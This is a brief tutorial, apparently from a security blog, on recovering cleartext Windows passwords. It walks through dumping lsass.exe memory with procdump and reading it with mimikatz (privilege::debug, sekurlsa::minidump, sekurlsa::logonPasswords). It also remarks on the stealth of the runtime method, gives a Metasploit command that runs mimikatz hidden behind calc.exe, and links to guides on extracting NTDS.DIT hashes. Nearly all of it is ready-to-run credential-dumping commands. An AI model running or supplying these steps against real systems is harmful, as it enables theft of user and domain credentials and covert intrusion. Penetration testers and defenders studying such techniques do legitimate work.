Benjamin Delpy found that the windows process lsass.exe stores password in memory in a reversible way.
Then he developed a great tool called "mimikatz" - the next lines are some steps to get some cleartext passwords
Use "procdump" a tool from (Russinovich) Microsoft to dump the memory of the lsass.exe process
(download http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx)
> procdump -accepteula -ma lsass.exe lsass.dmp
run mimikatz and use debug mode
> privilege::debug
use minidump mode and load the lsass.dmp
> sekurlsa::minidump lsass.dmp
Another way is to run mimikatz in runtime, but it is not stealthy (some AV flag it)
Run mimkatz in debug mode
> privilege::debug
get passwords in memory
> sekurlsa::logonPasswords
You can use Mimikatz in Metasploit too
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Thanks: (the great Benjamim Delpy)
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
Another interesting vector is getting hashes from NTDS.DIT (active directory database)
http://blog.spiderlabs.com/2013/11/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system-.html
http://neobits.org/extracting-ntds-dit-from-a-live-domain-controller-the-easy-way/
http://bernardodamele.blogspot.pt/2011/12/dump-windows-password-hashes_16.html
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
